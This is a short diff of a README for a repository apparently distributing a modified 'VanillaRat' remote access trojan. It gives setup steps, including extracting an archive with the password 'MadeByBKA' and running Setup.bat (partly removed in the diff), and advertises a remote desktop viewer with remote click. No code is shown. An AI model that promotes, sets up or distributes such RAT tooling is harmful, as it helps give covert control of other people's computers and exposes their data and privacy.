BundeskriminalamtInv0lved/VanillaRatModification/README.md

-# WARNING!

-Install via Setup.bat or else u will have Client Loss!

 # How to Setup
 Extract it with the Password: MadeByBKA <br> </br>
-Open Setup.bat Then just follow the Instructions

 # Features
 Remote Desktop Viewer (With remote click)<br> </br>